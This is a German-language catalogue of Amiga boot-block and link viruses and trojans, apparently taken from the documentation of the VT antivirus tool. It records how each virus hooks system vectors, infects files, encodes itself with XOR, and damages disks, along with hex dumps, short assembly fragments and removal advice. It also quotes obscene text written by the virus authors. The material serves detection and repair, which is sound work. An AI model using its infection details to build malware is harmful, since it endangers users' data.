.#·#·#·#·#··#·········#·#··#·#·#·#·##.·### ····#··#·.##·#·#··#·####·#··##·####·······#·#·#··#·#··##·#···..# ····#··#··.#·##···#.#·.#·#···#·#··#······#··#·####·#···#·###·### ··········································##···················· - INFECTOR Virus BB ein Fast Eddie Clone Nur Texte geaendert. Wieder einmal eine Meisterleistung !!! KickTag, KickCheckSum KS2.04 nein im Prg nach Reset noch DoIo, $6c, im Speicher immer $7F000 fordert trackdisk.device NICHT. Im BB ist an $1c !IN! zu lesen Wird aktiv wenn Block 880 gelesen wird Schaeden: blockiert nach 15 oder 20 Min. Rechner (Farbspiel) schreibt eigenen Virus-BB bestimmt einen Block ueber $DFF006 durch mulu #6,d7 und schreibt in diesen Block ab $100 INFECTOR GO! . Block: 732 000000f0: 34071070 b9f9b1c6 3b3bf014 47d8b589 4..p....;;..G... 00000100: 494e4645 43544f52 20474f21 f403d488 INFECTOR GO!.... 00000110: 607c98e2 5e0d3de0 28ca7775 a94a0f0e `...^.=.(.wu.J.. Dieser Block und auch das File kann NICHT gerettet werden. Benennt Disknamen um >INFECTOR BY DARK< . Arbeitet mit $6E000, dies ist nur bei einer DD-Disk der RootBlock !! Block: 880 000001a0: 00000000 00001624 00000359 00000b1d .......$...Y.... 000001b0: 1d3e494e 46454354 4f522042 59204441 .>INFECTOR BY DA 000001c0: 524b3c00 00000000 00000000 00000000 RK<............. Auf einer HD-Disk wird also ein zusaetzliches File zerstoert. Codiert jeden BB neu mit ByteWert von $DFF006 eor.b d1,(a0)+ . Decodiert eigenen BB mit eor.b d6,(a0)+ . Decodiert im Speicher : THIS IS THE FIRST VIRUS WRITTEN BY THE DARK AVENGER !!! siehe auch oben bei Fast Eddie - Infiltrator Link anderer Name Klein-Virus (von mir nicht nachvollziehbar) Arbeitet erst ab dos.library-Version #36 oder hoeher (also keine Vermehrung mit KS1.2 oder KS1.3) Verbiegt OldLoadSeg (NewLoadseg wird nicht verbogen) Ueberprueft ob Virus schon installiert mit Zeichenfolge "1992". Verlaengert ein File um 1052 Bytes. Am File ist das Virusprogramm codiert mit eori.b x,(A0)+ . Das Byte x aendert sich bei jedem neuen Linkvorgang in Abhaengig- keit von $DFF006 . Im Programm ist ein Textteil codiert mit: move.w #$80,d0 loop: eor.b d0,(a0)+ dbra d0,loop Decodiert ist dann zu lesen: Howdy hacker! This is The Infiltrator! usw. Versucht auch ein File "user.data",0 zu oeffnen. Arbeitsweise: - Sucht nach dem Langwort, das die Laenge des 1.CodeHunks enthaelt und erhoeht den Wert um $107 . - Schreibt zu Beginn des 1. CodeHunks 6100xxyy (bsr xxyy) d.h. der OriginalSourceCode wird ueberschrieben. - Haengt sich codiert am Ende des 1.OriginalCodeHunks an. d.h. keine Erhoehung der HunkAnzahl. Vermehrungsbedingungen: - Disk validated - mindestens 8 Bloecke Platz - 1. CodeHunk nicht groesser als $1ffc * 4 = $7FF0 (von Virusprogramm getestet ) - Test 1. Wort im CodeHunk auf - $4EF9 (Jmp) falls ja keine Verseuchung - $4EB9 (Jsr) falls ja keine Verseuchung - Test ob schon von Infiltrator verseucht 1. Wort im CodeHunk auf - $6100 (bsr) falls ja 2. Test an anderer Stelle auf - $48E7FFFE falls ja schon verseucht, deshalb Ende. Ergebnis: verseucht auch libs, devices usw. AUCH auf FESTPLATTE !!!!! NACHTRAG 26.07.92 : entgegen dem schon befallen Selbsttest ist es mir gelungen das Virusprogrammteil 2x an diskfont.library zu linken !!!! Erfolg: NICHT alle Programme sind danach lauffaehig !!!!! (von Shell mehr als von WB) Ausbau: VT versucht den Originalzustand wieder herzustellen. Falls es Probleme gibt, wenden Sie sich bitte an mich. NACH dem FileTest machen Sie bitte ein EinzelFileCopy auf eine leere formatierte Disk. Zwei Gruende: - die Fragmentierung der Files wird aufgehoben (Disk ist wieder schneller) - es werden nur benutzte Bloecke kopiert, d.h. jetzt nicht mehr von Files belegte Bloecke werden nicht mitkopiert und so kann dann auch BlockITest keinen Infiltrator auf der NEUEN Disk in einem unbenutzten Block finden. Suche: Sie MUESSEN mit FileTest suchen. Bei BlockKette kann eine Meldung unterbleiben, wenn von den 3 Testlangworten 2 im Block x und 1 LW im Block x+1 liegen. Bitte: Suchen Sie NICHT nach verseuchten Files, solange ein sogenanntes "Nutzprogramm" aktiv ist, das loadseg verbiegt. Hinter diesem Nutzprg koennte der Infiltrator liegen !!! Folge: Das Nutzprogramm ueberprueft beim Laden das File und stellt fest, dass das File von ihm NICHT zu bearbeiten ist (also z.B. nicht gepackt) und uebergibt an den "OrigLoad- Seg-Vektor". Nur leider ist der "OrigLoadSeg-Vektor" auf die Infiltrator-Routine verbogen !!!! Ihre Erfolgsaussichten sind NULL !!!!!! - INFLUENZA BB Cool $7F320, DoIo $7F0FC, $60, immer ab $7F000 Fordert trackdisk.device NICHT Turk-Clone Unterschiede: - Cool-Einsprung im Prg. verschoben - keine DisplayAlert-Routine Vermehrung: ueber BB Schaeden: - schreibt FUCK nach $60 - Sobald in $300 (absolut!) der Wert #10 steht, wird die Disk von Zylinder 0-39 formatiert. Namensbegruendung: im BB ist zu lesen: 20202020 48452048 45203c2d 20202d2b HE HE <- -+ 2d204920 4e204620 4c205520 45204e20 - I N F L U E N 5a204120 2d2b2d20 202d3e20 20205355 Z A -+- -> SU - Inger IQ ByteBandit/Forpib-Clone s.d. Text: ---Inger IQ Virus - Ersmark 1953--- - INGO-ZENKER-Clone BB KS2.04: ja im Speicher immer ab $7F800 Cool $7F86c DoIo $7F894 NEU: $6c Fordert trackdisk.device NICHT Versucht im BB durch lesbaren Text zu taeuschen: 426f6f74 6c6f6164 65722062 7920496e Bootloader by In 676f2021 20283136 20466562 20313939 go ! (16 Feb 199 33290000 00000000 00000000 00000000 3).............. Im Speicher ist zu lesen: 001b0610 00014cdf 7fff4e75 4e6f7720 ......L..NuNow 49606d20 696e2074 68652033 30204765 I`m in the 30 Ge 6e657261 74696f6e 21496e67 6f206973 neration!Ingo is 20424143 4b202121 20284841 48414845 BACK !! (HAHAHE 48454849 2921444f 53000000 00000000 HEHI)!DOS....... Der BB holt in Wirklichkeit ab $70000 auf Speichermedium (bei Disk Zyl 40 Sektor 16-19) 4 Bloecke. Die ersten beiden Bloecke enthalten das Virusteil. Die restlichen beiden Bloecke enthalten den ehemaligen Orginal-BB. Dabei wurde ab der DOS-Kennung == INGO!! == eingetragen. Dies behindert die Vermehrung nicht, da das Virusteil erst ab $C in den Orginal-BB einspringt. Das Virusteil meldet sich NICHT. Vermehrung und Schaeden: Der Orginal-BB der eingelegten Disk wird nach $7FC00 geholt, == INGO!! == eingetragen und dann mit dem Virus-Teil nach Zyl 40 Sektor 16 ff. abgespeichert. File-Bloecke an dieser Stelle oder die BitMap (im Test passiert) werden ueberschrieben und koennen NICHT gerettet werden !! Tut mir leid. Danach wird der Bootloader in den BB geschrieben. Falls der BB-loader erkannt wurde, sollte das Gadget O-BB aktiviert werden. Sie koennen damit versuchen, den Original-BB von Zyl 40 zu holen. VT schreibt dann die Dos0-Kennung und $370 neu. Danach wird die BB-CheckSum neu berechnet. Diesen BB koennen sie dann mit Speicher-BB zurueckschreiben oder im File-Req abspeichern. Vielleicht haben Sie Glueck und ihre Disk bootet wieder. Der Fehler auf Zyl 40 kann aber NICHT behoben werden. Auf Festplatte arbeiten Sie bitte so NICHT. Holen Sie das Backup des Rigid-Bereichs hervor (das haben Sie doch oder ???) und schreiben Sie den Rigid-Bereich mit ihrer Kontroller-Software (ist mir lieber so) oder wenn es gar nicht anders geht mit VT- Restore zurueck. NEU: Ueber $6c wird eine Speicherstelle aufgezaehlt. Sobald der Wert $3000 erreicht ist, werden beim naechsten DoIo-Zugriff ab $6E000 (ist nur bei DD-Disk der Rootbereich) $1800 Bytes geschrie- ben. Die ersten $400 Bytes enthalten immer das Wort iNGo und die restlichen $1400 Bytes Speichermuell von $70400. 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo Sollten Sie so eine Disk haben, so ist eine Rettung leider un- moeglich. Sie koennen zwar einmal Disksalv2 probieren, aber ich hatte damit NICHT viel Erfolg. Hinweis 28.11.93: Das VirusTeil verseucht auch FFS-Disketten. Da aber immer ein DOS0-BB geschrieben wird (ist ausgetestet), wird beim naechsten Schreibzugriff (z.B. copy File) die Disk- Struktur noch weiter zerstoert. - INGO BB DoIo, KickTag, KickCheckSum KS2.04: ja Fordert trackdisk.device NICHT LADS/ZEST-Clone s.u. Unterschied: DisplayAlert abgeschaltet Namensbegruendung: im BB ist zu lesen: f00f494e 474f2049 53205350 45414b49 ..INGO IS SPEAKI 4e472021 212100ff 00fc2344 45415448 NG !!!....#DEATH - INGO'S RETURN BB abcd bei $396 duerfte zur Lamer-Familie gehoeren. schreibt FUCK!! in irgendeinen Block BeginIo, KickTag, KickCheckSum, SumKickData KS2.04 nein Codiert jeden Virus-BB neu Namensbegruendung: decodiert mit eor.b d0,(a0)+ ist im Speicher zu lesen: >>INGO`S RETURN << suffer! Von INGO`S RETURN zerstoerte Bloecke in einem File sind NICHT mehr zu retten. Tut mir leid. - init_cli anderer Name: AMIGAKNIGHTVIRUS s.o. - INTEL.Gag sofort loeschen Laenge: 3384 Bytes Keine verbogenen Vektoren, keine Vermehrungsroutine Im File ist uncodiert zu lesen: 54482f53 00245645 523a206c 6f616477 TH/S.$VER: loadw 62203337 2e312028 31362e31 2e393129 b 37.1 (16.1.91) 0a0d0000 776f726b 62656e63 682e6c69 ....workbench.li In Abhaengigkeit von $DFF006 wird entweder der loadwb-Befehl ausgefuehrt oder der Versuch unternommen, eine Graphik auszu- geben (blauer Hintergrund, helle Zeichnung). Ich habe auf KEINEM Rechnertyp eine SAUBERE Zeichnung gesehen. Die Weiter- arbeit ist danach nicht moeglich. VT bietet loeschen an. Bitte kopieren Sie den Original-loadwb-Befehl neu nach c . - INTERLAMER-Virus anderer Name: A.I.S.F.-Virus siehe oben - IQ Breaker virus BB anderer Name: BadBytes3-Virus siehe oben - IRAK3-Virus BB und Link CCCP-Clone siehe oben KS1.3 ja KS2.04 ja Mehrfachlinks: ja Defekte Files: ja (Hunkstruktur defekt nur loeschen moeglich) Nur Text geaendert: 70004e75 4952414b 20332056 49524df8 p.NuIRAK 3 VIRM. 006c43fa 0018b3d6 67062356 00042c89 .lC.....g.#V..,. - IRQ-TeamV41.0 Link-Virus, verlaengert ein Prg. um 1096 Bytes Einsprung nach Reset: KickTag Einsprung bei Arbeit: OldOpenLib laeuft nicht mit KS2.04 Textanzeige im CliTitel: (entschluesselt mit eor.l d0,(a0)+ addq.l #3,d0 ; fuer einen neuen Virus wird der Inhalt von d0 ueber move.l alterWert,d0 u. add.l $dff004,d0 veraendert) AmigaDOS presents:a new virus by the IRQ-TeamV41.0 entweder wird c/dir oder das erste File der startup-sequence befallen. K e i n File wird zweimal befallen. Das File darf nicht laenger als 100 000 Bytes sein. Entfernung: 1.Zeile in startup. loeschen OrigFile besorgen und neu kopieren - IRQ II wie IRQ I, aber die Routine auf Test schon befallen (cmpi. #$fffe6100,30(a4,d6.l) wurde verfaelscht. Das heisst: das erste File von der startup-sequence wird solange befallen, (d.h. verlaengert) bis die Disk voll ist. Nachtrag:gilt fuer IRQI+II; mit meiner FastmemKarte ist n a c h einem Reset keine Vermehrung mehr moeglich ????? Hinweis: Ich besitze ein IRQ2-File mit sechs Links Hinweis 03.09.92: Ab VT2.44 sollten mehrere IRQ2-Links ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke - istrip-Trojan File gegen BBS Filename: istrip.bin Laenge ungepackt: 1156 Bytes Verwendet ungerade Adresse Keine verbogenen Vektoren Will user.data nach eatme.lha schreiben Empfehlung: Loeschen Decodiert mit eori.l #$11111111,(a3)+ ist im File zu lesen: 636f6e66 69670000 75706c6f 61642f65 config..upload/e 61746d65 2e6c6861 00626273 3a757365 atme.lha.bbs:use 722e6461 74610000 00000000 00000000 r.data.......... Taeuschtext in File_ID: ;...... --> ISTRIP 2.1 beta LhA turbo stripper! <-- --> There is no other stripper! Doesn't <-- --> use LhA for stripping, custom 680x0 <-- ;...... - JEFF-BUTONIC V1.31/05.11.88 PrgFileVirus 3408 Bytes DoIo, KickTag, KickCheckSum, $68 schreibt sich in die 1. Zeile der Startup-Sequence einer nicht schreibgeschuetzten Disk. Tarnnamen s.u. Die Anzahl der neuen Buchstaben wird am Ende der Startup-Sequence weg- genommen. Texte codiert mit: eori.l #$AAAAAAAA,(a0)+ Text fuer DisplayAlert: "Einen ganz wunderschönen guten Tag!" "* I am JEFF - the new Virus generation on Amiga *" "(w) by the genious BUTONIC." "V 1.31/05.11.88 - Generation Nr.00037" "Greetings to * Hackmack *,* Atlantic *, Wolfram, Frank," "Miguel, Alex, Gerlach, and to the whole Physik-LK from MPG !!" Texte fuer die Fensterleiste: "Ich brauch jetzt'n Bier!" "Stau auf Datenbus bei Speicherkilometer 128!" "Mehr Buszyklen für den Prozessor!" "Ein dreifach MITLEID für Atarist!" "BUTONIC!" "Schon die Steinzeitmenschen benutzten MS-DOS...einige sogar heut noch!" "Schon mal den Sound vom PS/2 gehört???" "PC/XT-AT: Spendenkonto 004..." "Unabhängigkeit & Selbstbestimmung für den Tastaturprozessor!" "Paula meint, Agnus sei zu dick." "IBM PC/XT: Ein Fall für den Antiquitätenhändler..." "Sag mir, ob du Assembler kannst, und ich sage dir, wer du bist." Tarnnamen: fuer RootDir: in Startup-Sequence: AddBuffers "AddBuffers 20" Add21K "Add21K " Fault "Fault 206" break "break 1 D" changetaskpri "changetaskpri 5" wait "wait " $A0 $A020 $A0A0A0 $A0A0A020 Arthus "Arthus " Helmar "Helmar " Aloisius "Aloisius " ?? $20 $2020 ?? die Erzeugung des $20-Tarnnamen ist nicht gelungen, steht aber im Virus-Prg. Nachtrag 03.03.93: Es ist ein JEFF-BUTONIC V1.31 Clone aufgetaucht. Laenge bleibt 3408 Bytes. Nur Texte geaendert. Bilden Sie sich selbst ihre Meinung. Wird von VT als JEFF-BUTONIC V1.31. erkannt. DisplayAlert-Text: Es tut mir leid es ihnen zu sagen ! *Ihr computer hat AiDS ein neuer Virus* Gemacht von Donald & Micky IM Jahre 1992 - Generation Nr.05426 Grüße gehen an : Metalwarrior - Mozart - Tiger 1 - Poge Außerdem noch an : Meinen Virus-Freund David Hasselhoff ! Texte fuer Fensterleiste: Tina zeig mir deine Votz Hey du Depp am Computer ! was is ? Hilfe die NFL-Kappen Kommen ! Redskins - Fickt euch alle !!! Evil C ! Der Vorkotzer er will nicht kotzen !! Rechtfertige er sich ! Easy and fast-- Schnebber-Pax !! Burger du Drecksack !! Popper überfährt man mit einem Chopper !! Rod Grod Med Flod !! Fuck for oil And for NLF-Deppen !! Ihr Assigen NFL-Ficker ihr seid alle schwul und dumm !! neue Dateinamen fuer das Virus-file: "D.Hasselhoff " "Jesus " "Archippus" "Philemon " "-->PAX<-- " "---->",$3E $A020 $A0A020 "NKOTB " "Ephesus" "Guardians" $2020 $2020 Nachtrag 01.08.93: Es ist ein JEFF-BUTONIC V1.31 Clone aufgetaucht. Versions_Nr. 4.55 (siehe unten) KS2.04 : ja Laenge bleibt 3408 Bytes. Nur Texte geaendert. Bilden Sie sich selbst ihre Meinung. VT bei FileTest: Wird als JEFF-BUTONIC V1.31 erkannt, da der Name codiert ist. VT bei SpeicherTest: Wird als JEFF-BUTONIC V4.55 erkannt, da der Name im Speicher decodiert ist. neue Texte: e0014cdf 7fff4ef9 00f810d4 006c1848 ..L...N......l.H 616c6c6f 20686f66 66656e74 6c696368 allo hoffentlich 2073746f 65726520 69636820 73656872 stoere ich sehr 202100ff 0034302a 20492061 6d204a45 !...40* I am JE 4646202d 20746865 206f6c64 20566972 FF - the old Vir 75732066 616d696c 7920666f 7220616e us family for an 20416d69 6761202a 00ff008c 3c287729 Amiga *....<(w) 20627920 74686520 6e696365 6c792020 by the nicely 4255544f 4e49432e 00ff0064 48562034 BUTONIC....dHV 4 2e35352f 32392e30 322e3933 202d2047 .55/29.02.93 - G 656e6572 6174696f 6e204e72 2e303030 eneration Nr.000 303100ff 001c5a4b 696c6c69 6e677320 01....ZKillings 676f746f 2a20426f 6f745820 2020202a goto* BootX * 2c2a2056 69727573 5a202020 2a2c2056 ,* VirusZ *, V 69727573 5f436865 636b6572 202c00ff irus_Checker ,.. 000c6456 69727573 636f7065 2c204d61 ..dViruscope, Ma 7573202c 20566972 75732d43 6865636b us , Virus-Check 6572202c 20566972 75732043 6f6e7472 er , Virus Contr 6f6c2061 6e642062 69672056 54202121 ol and big VT !! 00ff4aa9 01000000 48616c6c 6f206769 ..J.....Hallo gi 62206469 6520436f 6c612068 65722021 b die Cola her ! 004c6173 73206469 65204368 69707320 .Lass die Chips 726f6573 74656e20 756e6420 6e696368 roesten und nich 7420726f 7374656e 20212121 21004e69 t rosten !!!!.Ni 6d6d2064 69652042 69726e65 20776567 mm die Birne weg 20736f6e 7374206b 72616368 74732100 sonst krachts!. 57656e6e 20447520 6e696368 74207370 Wenn Du nicht sp 75727374 2064616e 6e206769 62747320 urst dann gibts 24210042 6f54694e 75432100 53636861 $!.BoTiNuC!.Scha 656d2044 69636820 44752042 616e6175 em Dich Du Banau 7365206c 61737320 65732073 61757365 se lass es sause 204a756e 67652020 2e2e2e61 62657220 Junge ...aber 6e696368 74207363 686c6170 70692e2e nicht schlappi.. 2e210057 696c6c73 74204475 204e6163 .!.Willst Du Nac 6868696c 6665206f 64657220 77617320 hhilfe oder was 6973206c 6f732020 3f004769 62206573 is los ?.Gib es 20617566 20447520 6c61686d 65722073 auf Du lahmer s 6f636b65 2e2e2e00 57657220 616e6465 ocke....Wer ande 726e2065 696e6520 47727562 65206772 rn eine Grube gr 61656274 20666165 6c6c7420 73656c62 aebt faellt selb 73742069 6e206469 6573656c 62696765 st in dieselbige 20212121 00576f20 77696c6c 73746520 !!!.Wo willste 64656e20 6a65747a 74207769 65646572 den jetzt wieder 2068696e 004b616e 6e737420 4475206d hin.Kannst Du m 616c2052 75686520 67656265 6e204475 al Ruhe geben Du 20616c74 6572204b 6e6f6368 656e2d4b alter Knochen-K 65726c20 2e2e2e00 4c696562 73742044 erl ....Liebst D 75205669 72656e2c 2064616e 6e207765 u Viren, dann we 69737320 69636820 61756368 2c207765 iss ich auch, we 72204469 63682061 6d206d65 69737465 r Dich am meiste 6e206861 73737400 0000 n hasst... neue Tarnnamen in Startup-Seq.: 4c 6f616457 42202020 20202020 00 = "LoadWB ",0 4d6f75 6e742020 00 = "Mount ",0 436c73 20202020 202000 = "Cls ",0 56 69727573 59202020 00 = "VirusY ",0 736574 636c6f63 6b206f70 74206920 00 = "setclock opt i ",0 696e66 6f2000 = "info ",0 a02000 = " ",0 a0a0 a02000 = " ",0 62656c69 782000 = "Obelix ",0 49 64656669 782000 = "Idefix ",0 41 73746572 69782020 00 = "Asterix ",0 202000 = " ",0 Nachtrag 02.08.93: Es ist ein JEFF V4.55 aufgetaucht, der mit Hunklab an SnoopDos angelinkt ist. (siehe unten bei SnoopDos-JEFF) Wurde bisher schon als HunkLab erkannt bei FileTest und RICHTIG ausgebaut. Wurde bisher schon als JEFF-Virus erkannt bei SpeicherTest. - JEFF-BUTONIC V3.00/9.2.89 PrgFileVirus Laenge: 2916 Bytes Name im Hauptverzeichnis: A0A0A0 1.Zeile in startup. A0A0A0209B41 DoIo, KickTag, KickCheckSum Vermehrung: jede nicht schreibgeschuetzte DOS-Disk mit startup Entfernung: 1.Zeile in startup loeschen File in DfX: loeschen Entschuesselungsroutine: entschluesselter Text: move.w #$013a,D0 Hi. loop: JEFF`s speaking here... move.w (A0)+,(a1) (w) by the genious BUTONIC. eori.w #$b4ed,(A1)+ usw. insgesamt ueber $270 Bytes Text dbf D0, loop Nachtrag: entdeckter Spezialfall: Auszuege erzeugt mit VT/zZyl/druck R-Zyl Bl 2 FHeader ChS: ok 0000: 00000002 00000372 00000001 00000000 .......r........ 0010: 00000374 753f2cf2 00000000 00000000 ...tu?,......... ;....nur Null 0130: 00000000 00000374 00000000 00000000 .......t........ 0140: 00000000 00000004 00000000 00000000 ................ ^^^^^^^^=Taeuschlaenge ;....nur Null 01a0: 00000000 0000014e 0000013b 00000511 .......N...;.... 01b0: 10737461 72747570 2d736571 75656e63 .startup-sequenc 01c0: 65000000 00000000 00000000 00000000 e............... 01d0: 00000000 00000000 00000000 00000000 ................ 01e0: 00000000 00000000 00000000 00000000 ................ 01f0: 00000000 00000371 00000000 fffffffd .......q........ R-Zyl Bl 4 DATA-Bl ChS: ok 0000: 00000008 00000372 00000001 0000000b .......r........ ^^^^^^^^ = 11 = wirkliche Laenge 0010: 00000000 c4404f07 a0a0a020 9b410a74 .....@O.... .A.t ^^ 0020: 2e780a00 1819999f 99860700 001f9986 .x.............. ^^^^^^ = Originalladeprogramm = t.x Ablauf: Es handelt sch um eine Spiele-Disk, bei der die startup- sequence nur aus einer Zeile mit dem Inhalt "t.x",0a - also vier Zeichen - bestand. Das Virusteil hat sich nun an den Anfang der startup gesetzt und die Filelaenge im FileHeader-Block (s.o. $372=882) NICHT geaendert. Im DataBlock (s.o. $374=884) steht aber $b = 11 . $a0,$a0,$a0,$20,$9b,$41,$0a = Virusteil = 7 "t.x",$0a = LadePrg. = 4 = 11 Es wurde mehrfach ausprobiert. Das Virusteil wird gestartet und danach wird das Spiel gestartet. SID zeigt als Filelaenge 4 an. Wird nun ED gestartet und die 1.Zeile geloescht (es wird NUR EINE Zeile geladen) und danach neu abgespeichert, so geht "t.x",0a VERLOREN !!!! Das Spiel wird nicht mehr geladen !!!!! Man kann den Virusnamen aber auch nicht einfach stehen lassen, weil dann die startup mit "Programm nicht gefunden" abgebrochen wird. Schauen Sie sich also bitte mit VT oder einem DiskMonitor (ein FileMonitor REICHT NICHT) das File Startup-Sequence genauer an. Die Blocklage der Startup- Sequence koennen Sie in BlockKette bestimmen (schalten Sie SeitenStopp ein). - JEFF-BV3.00Hunklab Fall 1: File Laenge ungepackt: 33704 Bytes An das Prg. SeekSpeed wurde mit Hunklab ein Jeff V3.00 ange- linkt. Wird im Speicher als Jeff V3 erkannt. VT bietet bei Filetest Ausbau an. Fall 2: File Laenge ungepackt: 9396 Bytes An das Prg. mount wurde mit Hunklab ein Jeff V3.00 ange- linkt. Wird im Speicher als Jeff V3 erkannt. VT bietet bei Filetest Ausbau an. - JEFF-BUTONIC V3.10 Filevirus Laenge: 2916 Bytes lesen Sie Auswirkungen unter Jeff 3.00 Programmcodeteile wurden verschoben (soll Anti-Viren-Prge wohl taeuschen ??) + codierte Texte geaendert: z.b. Sauf blos keinen Wodka! usw. Codierung weiterhin: eori.w #$b4ed,(a1)+ Ursprungprogramm: *JEFF* VIRUSKILLER Mastercruncher: 7368 entpackt: 9064 andere Namen: Jeff-Maker, Jeff-Remover taeuscht durch Texte Jeff-Suche vor, schreibt aber in Wirklich- keit JEFF 3.10 auf Disk in Df0: Virus gefunden - bitte warten Startup-Sequence desinfiziert und Virus beseitigt! usw. In diesem Prg ist JEFF V3.10 codiert [ eori.b $FF,(a0)+ ] ent- halten. - JEFF-BUTONIC V3.20 Filevirus Laenge 2900 Jeff 3.0 Clone Beweis:codierter Text gleich Die 16 gewonnenen Bytes kommen z.B. von der Adressierungsaenderung .l in .w . Das VirusPrg laeuft zwar an und verbiegt die Vektoren, aber bei einem Diskwechsel kommt der GURU. Eine Vermehrung konnte also von mir NICHT erreicht werden. Also keiner Erwaehnung wert. Leider nicht. Dieses unsichtbare File wurde auf einer A3000-HD in c gefunden. Die Startup-sequence war modifiziert und verhinderte den ordnungsgemaessen Bootvorgang. Ein 2.Fall wurde im Feb. im Fido-Netz besprochen, wobei hier aber nur ueber die Vektoren geschrieben wurde und das namentliche Nicht-Erkennen des Prg.s . Da bei einer HD der Rootblock nicht mit $6e000 gefunden werden kann, darf es gar nicht zu einer Vermehrung kommen. Ich vermute deshalb, dass ein anderes Prg. die Installierung vornimmt. Der Prg.Name ist NICHT bekannt. Stand:07.03.92 Empfehlung: SOFORT loeschen und startup-seq. ueberpruefen. - JEFF-BUTONIC V4.55 Laenge:3408 JEFF-BUTONIC-V1.31-Clone (siehe oben) - Jeffkiller V2.67 Trojan anderer Name: DIGITAL-DREAM-Inst. siehe oben - JINX-BB-Virus 1024 Bytes KickTag, KickCheckSum, SumKickData, BeginIo, Exec-Vec 5 Speicherlage: abhaengig von SysStkLower und Wert aus $DFF007 KS2.04: Ja Vermehrung: BB Decodiert mit "eori.b d0,(a0)+" ist im Speicher zu lesen: 7badaba9 7a004a49 4e580074 7261636b {...z.JINX.track 6469736b 2e646576 69636500 00000000 disk.device..... - JITR Cool, DoIo, FastMem ja, im Speicher immer ab $7ec10 Vermehrung: ueber BB Sonst keine Routine vorhanden !!!! VirusPrg. nur $200 Bytes lang. Im BB lesbar: I'm a safe virus! Don't kill me! I want to travel! And now a joke : ATARI ST This virus is a product of JITR - JiZANSi GAG ???? Laenge: 22008 Bytes GFA-Basic Keine verbogenen Vektoren Empfehlung: Sofort Loeschen Am Ende des Files ist zu lesen: 000003ea 000000a8 000000ea 06004946 ..............IF 4633325f 544f5f41 4e534953 6f727279 F32_TO_ANSISorry ;..... 466f726d 61747469 6e672063 796c2020 Formatting cyl 746f2067 6f2e5665 72696679 696e6720 to go.Verifying 2063796c 20466f72 6d617420 6661696c cyl Format fail 65643a20 54727920 61206469 66666572 ed: Try a differ 656e7420 6469736b 2e4a7573 74206b69 ent disk.Just ki 6464696e 67202d20 41505249 4c204641 dding - APRIL FA 554c5453 20212121 65786563 75746572 ULTS !!!executer ;..... 00ff000f 4746412d 42415349 43000000 ....GFA-BASIC... ;..... Nach der mitgelieferten Dok sollen damit IFF-Bilder in ANSI- Standard umgewandelt werden. In Wirklichkeit ersheint im Cli-Fenster sofort der Format- Text (s.o.) und nach einiger Zeit APRIL FAULTS (s.o.) Das HD-Licht flackert wirklich !!!! Eine Zerstoerung konnte in mehreren Versuchen NICHT festge- stellt werden. Das Teil ist nicht angelinkt, da Routinen aus dem ersten Prg-Teil angesprungen werden, sondern beide Teile wurden ZUSAMMEN (source vorhanden) entwickelt. Von solchen Programmen halte ich nichts. Anfaenger koennen dadurch zu unnoetigen Reaktionen veranlasst werden. Loeschen Sie bitte deshalb das Teil. Danke - Joshua senkrechtstehender Text Joshua (ueber Graphikroutine) Begin, Kickmem, KickTag, KickCheck, Vec5 - Joshua 2 anderer Name: Joshua3 oder Switch-Off Cold, Begin, Vec5 hat Probleme mit einem Befehl im C-SubD. von WB1.3 Bootblock jetzt verschluesselt: loop: move.b (A0),D0 eori.b #$18,D0 das eor-Byte wechselt und steht auch move.b D0,(A0)+ an $3ff des BBs. Zu erkennen ist der cmpa.l A1,A0 Joshua 2 am Ende des BBs an der Byte- bne loop folge, wobei sich aber das X je nach rts eor-Byte aendert: .XX...XXX........XX.XX.XXXX...X.XX. die Punkte koennen auch durch andere Zeichen belegt sein Hinweis 17.07.93: In letzter Zeit wird wieder eine zunehmende Verseuchung der BBe mit Joshua2 beobachtet. Versuche an einem A600 (OHNE Speichererweiterung) haben gezeigt, dass das Teil bei der Installierung zwar mit einem GURU antwortet (wg.Vec5), nach einem Reset aber ueber COLD weiterhin im Speicher aktiv UND vermehrungsfaehig ist !!!! - Joshua 3 anderer Name und richtig: Joshua 2 es existiert eine BB-Sammlung, die einen wirklichen ByteBandit (aufs Byte im Speicher) Joshua1 nennt. Hieraus ergibt sich dann eine falsche Nummer. Nachtrag: Diese BB-Sammlung wurde inzwischen (15.04.91) in diesem Punkt korrigiert !! - JoshuaKill.BB siehe unten bei erkannte Virenfinder - JT-Protec-Virus sofort loeschen Versucht durch Texte zu taeuschen: 00: 444f5300 766df475 00000370 61000072 DOS.vm.u...pa..r ;.... ^^^^^^^^ 40: 4a542056 69727573 2050726f 74656374 JT Virus Protect 50: 6f722031 2e30202d 20546869 73206973 or 1.0 - This is 60: 20612063 7573746f 6d204242 2c20646f a custom BB, do 70: 204e4f54 206b696c 6c206d65 21140048 NOT kill me!..H ^^ 80: e7fffe61 0e4cdf7f ff4e7505 98000141 ...a.L..Nu....A ^^^^^^ ;...... 80808080 002d2042 61736564 206f6e20 .....- Based on 74686520 47524541 54204242 2d766972 the GREAT BB-vir 75737072 6f746563 746f7220 62792047 usprotector by G 454f5247 20483052 4d414e21 2121202d EORG H0RMAN!!! - Zum Glueck ist die Version, die ich besitze NICHT lauf- faehig, da beim zusammensetzen des BBs ein Zaehlfehler unter- gekommen ist. Der Sprungbefehl trifft bei $80 auf einen un- gueltigen Befehl. Waere der Programmteil um 1 Byte verschoben und damit lauffaehig, so wuerde es sich um einen Coder-Clone handeln. - Julie anderer Name Tick oder VIRUS PREDATOR immer $7f800, cool, DoIo, BeginIo und $20 arbeitet nicht sauber mit 1MB Chip testet einige Zeiger und drei Werte (z.B. auf $7ec00) Vermehrung: ohne Warnung ueber (nur ausfuehrbare) BB's decodiert mit not.b (a0)+ steht im Speicher: ` VIRUS PREDATOR (4-88-SPAIN) ID: 027798336 ` also ist der Name Julie eigentlich falsch !! - KaKo-Virus BB Extreme-Clone s.o. Unterschiede zu Extreme: - Rootblockzeiger ($00000370) ersetzt durch "KaKo" = Namensbegruendung - String "dos.library" im BB verlagert - String "intuition.library" im BB verlagert - DisplayAlert-Text jetzt Leerzeichen Rest siehe bei Extreme-Virus Wurde bisher schon als Virus erkannt im BB und im Speicher !!! - KaKoloadwb File Laenge: 2804 Bytes ungepackt T.F.C.loadwb-Clone Aktiviert WB und installiert im Speicher KaKo-Virus-BB . 